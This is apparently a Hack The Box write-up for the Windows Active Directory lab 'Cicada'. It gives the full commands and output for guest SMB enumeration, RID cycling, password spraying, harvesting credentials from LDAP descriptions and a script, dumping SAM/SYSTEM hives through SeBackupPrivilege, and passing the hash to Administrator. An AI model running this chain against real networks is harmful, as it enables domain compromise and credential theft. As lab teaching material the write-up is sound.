htb-cicada

Cicada is an easy Windows Active Directory box. I’ll start by enumerating SMB shares to find a new hire welcome note with a default password. I’ll RID-cycle to get a list of usernames, and spray that password to find a user still using it. With a valid user I can query LDAP to find another user with their password stored in their description. That user has access to a share with a dev script used for backup, and more creds. Those creds work to get a shell, and the user is in the Backup Operators group, so I can exfil the registry hives and dump the machine hashes.

Recon

nmap

nmap finds thirteen open TCP ports on what looks like a Windows domain controller:

# Nmap 7.93 scan initiated Wed Oct  2 08:12:28 2024 as: nmap -Pn -sC -sV -oN cicada.nmap 10.129.93.29
Nmap scan report for 10.129.93.29
Host is up (0.014s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-02 13:12:39Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Not valid before: 2024-08-22T20:24:16
|_Not valid after:  2025-08-22T20:24:16
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-10-02T13:13:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct  2 08:14:00 2024 -- 1 IP address (1 host up) scanned in 91.74 seconds


The domain cicada.htb shows up on many ports, as well as the hostname CICADA-DC. I’ll add these to my /etc/hosts file:

10.10.11.35 cicada-dc.htb cicada.htb

RPC (135), NetBIOS (139), and SMB (445) are very common on all Windows machines. DNS (53), Kerberos (88), and LDAP (389, 636, 3268, 3269) are common on DCs.

Looking at ports to explore, I’ll triage them as:

  • SMB – If any anonymous access is allowed, this is potentially the best place to get documents and other information.
  • LDAP – If anonymous access is allowed, there will be users and potentially passwords.
  • DNS – I could brute force hostnames / subdomains on the domain.
  • WinRM – If I get creds, could provide a shell.

SMB – TCP 445

Share Enumeration

netexec shows the box is running Windows Server 2022:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb     
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)

Trying to enumerate shares without creds fails, but with user guest and an empty password it works:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb --shares
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
                                                                                                                      
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u guest -p '' --shares 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV                             
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON                        Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL                          Logon server share 
                                                                                                                      
┌──(puck㉿kali)-[~/htb/cicada]
└─$ 

ADMIN$, C$, and IPC$ are standard on any Windows host; the first two require admin access, and IPC$ doesn’t offer much of interest. NETLOGON and SYSVOL are standard on a DC. DEV and HR are specific to Cicada.

HR

The guest account has access to the HR share. I’ll connect with smbclient:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ smbclient -N //10.10.11.35/HR
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:29:09 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Notice from HR.txt                  A     1266  Wed Aug 28 19:31:48 2024

        4168447 blocks of size 4096. 439676 blocks available
smb: \> mget *
Get file Notice from HR.txt? y
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (29.4 KiloBytes/sec) (average 29.4 KiloBytes/sec)
smb: \> 

The file reads:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ cat 'Notice from HR.txt' 

Dear new hire!

Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.

Your default password is: Cicada$M6Corpb*@Lp#nZp!8

To change your password:

1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.

Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.

If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.

Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!

Best regards,
Cicada Corp

I’ll note that password.

RID Cycling

I’ll use netexec to brute force RIDs (relative identifiers) from 0 to 4000, resolving each one to a name via the guest session:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u guest -p '' --rid-brute 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\guest: 
SMB         10.10.11.35     445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)
SMB         10.10.11.35     445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB         10.10.11.35     445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)
SMB         10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)
                                                                                                                      
┌──(puck㉿kali)-[~/htb/cicada]

I’ll use grep and cut to make a users list from this:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ netexec smb cicada.htb -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\' -f2 | cut -d' ' -f1 | tee users 
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars


Auth as michael.wrightson

Find User

netexec can try the default password with each user on the list:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

It works for michael.wrightson.

Check Access

These creds work for SMB (above), as well as LDAP:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 

They don’t work over WinRM (the user likely isn’t an administrator or a member of the Remote Management Users group):

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc winrm cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' 
WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [-] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8


Auth as david.orelious

Enumeration

Shares

michael.wrightson doesn’t have any share access beyond what the guest user already has.

Users

With LDAP access, I can now pull a more complete list of users, including their description attributes, with the --users flag in netexec:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc ldap cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 
LDAP        10.10.11.35     389    CICADA-DC        [*] Total records returned: 8
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-
LDAP        10.10.11.35     389    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        Guest                         2024-08-28 17:26:56 1       Built-in account for guest access to the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        krbtgt                        2024-03-14 11:14:10 1       Key Distribution Center Service Account
LDAP        10.10.11.35     389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1               
LDAP        10.10.11.35     389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1               
LDAP        10.10.11.35     389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0               
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                2024-03-14 12:17:29 1       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 1               

The same query can be run over SMB with netexec smb [target] -u [username] -p [pass] --users; it returns the same information, just collected via a different port.

The description attribute on the david.orelious user reads: “Just in case I forget my password is aRt$Lp#7t*VQ!3”. The description field is readable by any authenticated domain user, so anything stored there is effectively public inside the domain.
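As an added example (my code, not the post’s or netexec’s), the following Python script parses the netexec --users table shown above and flags any description that looks like it carries a credential, the kind of audit a defender would run over an export of their own directory. The sample text is constructed from the output on this page so the script runs offline; a real run would read a saved netexec log instead.

```python
"""Audit netexec `--users` output for credentials leaked in AD description fields."""
import re
from dataclasses import dataclass

# Constructed sample: the `nxc ldap ... --users` table from the post, embedded so
# the script runs offline. Status lines and the header are included on purpose.
SAMPLE_OUTPUT = r"""
LDAP        10.10.11.35     389    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP        10.10.11.35     389    CICADA-DC        [*] Total records returned: 8
LDAP        10.10.11.35     389    CICADA-DC        -Username-                    -Last PW Set-       -BadPW- -Description-
LDAP        10.10.11.35     389    CICADA-DC        Administrator                 2024-08-26 20:08:03 1       Built-in account for administering the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        Guest                         2024-08-28 17:26:56 1       Built-in account for guest access to the computer/domain
LDAP        10.10.11.35     389    CICADA-DC        krbtgt                        2024-03-14 11:14:10 1       Key Distribution Center Service Account
LDAP        10.10.11.35     389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29 1
LDAP        10.10.11.35     389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29 1
LDAP        10.10.11.35     389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29 0
LDAP        10.10.11.35     389    CICADA-DC        david.orelious                2024-03-14 12:17:29 1       Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP        10.10.11.35     389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17 1
"""

# Every netexec line starts with protocol, host, port and hostname columns.
LINE_RE = re.compile(r"^LDAP\s+\S+\s+\d+\s+\S+\s+(?P<body>.*)$")
# A data row: username, "Last PW Set" timestamp, bad-password count, free-text description.
ROW_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<pwset>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\s+(?P<badpw>\d+)\s*(?P<desc>.*)$"
)
# Words that suggest the description is talking about a credential at all.
SECRET_HINT = re.compile(r"\b(password|passwd|pwd|passphrase|creds?|login)\b", re.I)


@dataclass
class UserRecord:
    username: str
    last_pw_set: str
    bad_pw: int
    description: str


def parse_users_table(text: str) -> list[UserRecord]:
    """Turn the --users table into records. The header and the [*]/[+] status lines
    are skipped automatically because they lack the timestamp every data row has."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        row = ROW_RE.match(m.group("body"))
        if not row:
            continue
        records.append(UserRecord(row["user"], row["pwset"], int(row["badpw"]), row["desc"].strip()))
    return records


def looks_like_password(token: str) -> bool:
    """Heuristic for a machine-style password: 8+ chars, at least one digit, and at
    least three of the four character classes. 'Built-in' fails (no digit)."""
    if len(token) < 8 or not any(c.isdigit() for c in token):
        return False
    classes = [
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    ]
    return sum(classes) >= 3


def find_leaked_secrets(records: list[UserRecord]) -> dict[str, list[str]]:
    """Map username -> password-like tokens for every description that either names
    a credential keyword or contains a token that looks like a password."""
    findings = {}
    for rec in records:
        tokens = [t for t in rec.description.split() if looks_like_password(t)]
        if tokens or SECRET_HINT.search(rec.description):
            findings[rec.username] = tokens
    return findings


if __name__ == "__main__":
    for user, tokens in find_leaked_secrets(parse_users_table(SAMPLE_OUTPUT)).items():
        print(f"[!] {user}: description contains credential material: {tokens}")
```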

Validate Creds

The creds work for SMB and LDAP, but not WinRM:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
                                                                                                                      
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc ldap cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.35     389    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
                                                                                                                      
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc winrm cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' 
WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [-] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3

Shell as emily.oscars

Dev Share

Identify

david.orelious sees the same list of shares, but unlike the accesses so far, can read the DEV share (and NETLOGON and SYSVOL, as any authenticated domain user can):

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 
SMB         10.10.11.35     445    CICADA-DC        [*] Enumerated shares
SMB         10.10.11.35     445    CICADA-DC        Share           Permissions     Remark
SMB         10.10.11.35     445    CICADA-DC        -----           -----------     ------
SMB         10.10.11.35     445    CICADA-DC        ADMIN$                          Remote Admin
SMB         10.10.11.35     445    CICADA-DC        C$                              Default share
SMB         10.10.11.35     445    CICADA-DC        DEV             READ            
SMB         10.10.11.35     445    CICADA-DC        HR              READ            
SMB         10.10.11.35     445    CICADA-DC        IPC$            READ            Remote IPC
SMB         10.10.11.35     445    CICADA-DC        NETLOGON        READ            Logon server share 
SMB         10.10.11.35     445    CICADA-DC        SYSVOL          READ            Logon server share 

Enumerate

I’ll connect with smbclient. There’s a single file, which I’ll grab:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ smbclient -U david.orelious //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3' 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Mar 14 13:31:39 2024
  ..                                  D        0  Thu Mar 14 13:21:29 2024
  Backup_script.ps1                   A      601  Wed Aug 28 19:28:22 2024

        4168447 blocks of size 4096. 438823 blocks available
smb: \> mget *
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (13.6 KiloBytes/sec) (average 13.6 KiloBytes/sec)
smb: \> 

Backup_script.ps1

The script creates a backup archive of C:\smb in the D:\Backup folder. It builds a PSCredential object for emily.oscars with a hardcoded password (which Compress-Archive never actually uses), leaving her creds in a share readable by david.orelious:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ cat Backup_script.ps1 

$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"

$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"


WinRM

Validate Creds

The creds work for both SMB and WinRM:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc smb cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' 
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt 
                                                                                                                      
┌──(puck㉿kali)-[~/htb/cicada]
└─$ nxc winrm cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' 
WINRM       10.10.11.35     5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM       10.10.11.35     5985   CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)


Shell

I’ll connect with Evil-WinRM:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> 


Shell as system

Enumeration

emily.oscars is in the Backup Operators group, which is what grants the SeBackupPrivilege and SeRestorePrivilege shown in the whoami /priv output above.

Exploit SeBackupPrivilege

Via reg / secretsdump

There are a few ways to exploit this privilege. I can dump registry hives to files and exfil them:

*Evil-WinRM* PS C:\programdata> reg save hklm\sam sam      
The operation completed successfully.                      
                             
*Evil-WinRM* PS C:\programdata> reg save hklm\system system
The operation completed successfully. 
*Evil-WinRM* PS C:\programdata> download sam
                                        
Info: Downloading C:\programdata\sam to sam
                                        
Info: Download successful!
*Evil-WinRM* PS C:\programdata> download system
                                        
Info: Downloading C:\programdata\system to system
                                        
Info: Download successful!

This is enough to get the local administrator hash for the box. I’ll use secretsdump.py from Impacket:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ impacket-secretsdump -sam sam -system system LOCAL  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up... 

That NT hash is enough to get a shell as Administrator with Evil-WinRM by passing the hash:

┌──(puck㉿kali)-[~/htb/cicada]
└─$ evil-winrm -i cicada.htb -u Administrator -H '2b87e7c93a3e8a0ea4a581937016f341'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

That was fun.